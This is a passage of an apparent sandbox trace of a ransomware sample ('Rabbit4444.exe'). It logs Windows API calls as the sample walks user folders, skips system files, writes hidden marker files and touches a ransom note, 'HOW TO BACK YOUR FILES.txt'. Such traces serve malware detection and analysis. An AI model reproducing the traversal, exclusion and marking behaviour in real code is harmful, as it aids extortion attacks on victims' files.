(lpString1="..", lpString2="..") returned 0 [0065.663] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf075ebc0, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf075ebc0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf075ebc0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.663] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.663] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.663] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf075ebc0, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf075ebc0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf075ebc0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.663] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0065.663] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.663] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.664] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.664] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.664] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.664] CloseHandle (hObject=0x2cc) returned 1 [0065.664] CloseHandle (hObject=0x2a0) returned 1 [0065.664] GetCurrentThreadId () returned 0xd98 [0065.664] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0065.664] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC" [0065.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1182e8 | out: hHeap=0xe0000) returned 1 [0065.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0065.665] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC" [0065.665] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\" [0065.665] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0065.665] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.668] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.670] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.671] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.671] CloseHandle (hObject=0x2a0) returned 1 [0065.672] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC") returned 80 [0065.672] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.672] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x37484b36, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf075ebc0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0065.672] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.672] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.672] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.672] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.672] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x37484b36, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf075ebc0, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.672] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.672] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.672] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.672] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.672] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.672] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf075ebc0, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf075ebc0, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0784e11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.672] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.672] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.672] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e8f3a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fd784cd, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0065.672] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.672] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.672] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0065.672] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0065.672] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0065.672] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0065.672] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0065.673] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0065.673] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0065.673] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0065.673] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0065.673] lstrcpyW (in: lpString1=0x130ebda, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0065.673] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0065.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0065.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x122fc0 [0065.673] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221e8 | out: ListHead=0xf68b0, ListEntry=0x1221e8) returned 0x11cfc8 [0065.673] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e8fc7a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fd784cd, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0065.673] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.673] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.673] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0065.674] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0065.674] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0065.674] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0065.674] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0065.674] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0065.674] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0065.674] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0065.674] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0065.674] lstrcpyW (in: lpString1=0x130ebda, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0065.674] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0065.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0065.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0xefb28 [0065.674] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1221e8 [0065.674] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e90475, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fd784cd, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0065.674] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.674] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.674] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0065.674] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0065.674] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0065.674] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0065.674] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0065.674] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0065.674] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0065.674] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0065.674] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0065.674] lstrcpyW (in: lpString1=0x130ebda, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0065.675] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0065.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0065.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x11ddb8 [0065.675] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x1222c8 [0065.675] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e90b81, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fd784cd, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0065.675] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.675] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.675] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0065.675] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0065.675] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0065.675] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0065.675] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0065.675] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0065.675] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0065.675] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0065.675] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0065.675] lstrcpyW (in: lpString1=0x130ebda, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0065.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0065.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123b20 [0065.675] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x121f88 [0065.675] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e90b81, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fd784cd, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0065.675] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0065.675] lstrcpyW (in: lpString1=0x130ebda, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.675] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.676] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.676] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.676] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.676] CloseHandle (hObject=0x2cc) returned 1 [0065.676] CloseHandle (hObject=0x2a0) returned 1 [0065.677] GetCurrentThreadId () returned 0xd98 [0065.677] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0065.677] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp" [0065.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123b20 | out: hHeap=0xe0000) returned 1 [0065.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0065.677] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp" [0065.677] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\" [0065.677] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0065.677] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.678] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.680] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.681] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.681] CloseHandle (hObject=0x2a0) returned 1 [0065.682] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp") returned 85 [0065.682] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.682] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e90b81, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0784e11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0065.682] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.682] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.682] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.682] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.682] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e90b81, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0784e11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.682] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.682] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.682] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.682] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.682] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.682] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0784e11, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0784e11, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0784e11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.682] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.682] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.682] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0784e11, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0784e11, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0784e11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.682] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0065.682] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.682] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.683] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.684] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, 